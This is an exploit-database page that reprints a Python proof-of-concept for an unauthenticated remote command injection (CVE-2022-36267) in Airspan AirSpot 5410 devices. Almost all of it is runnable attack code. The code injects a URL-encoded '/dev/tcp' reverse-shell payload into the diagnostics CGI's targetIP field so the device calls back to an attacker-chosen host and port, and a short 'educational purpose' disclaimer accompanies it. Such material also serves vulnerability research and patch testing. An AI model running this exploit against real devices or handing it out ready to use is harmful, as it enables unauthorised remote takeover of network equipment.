Advertisement






AirSpot 5410 0.3.4.1-4 Remote Command Injection

CVE Category Price Severity
CVE-2022-36267 CWE-78 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2022-08-11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080042

Below is a copy:

AirSpot 5410 0.3.4.1-4 Remote Command Injection
# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
                        
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
      return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum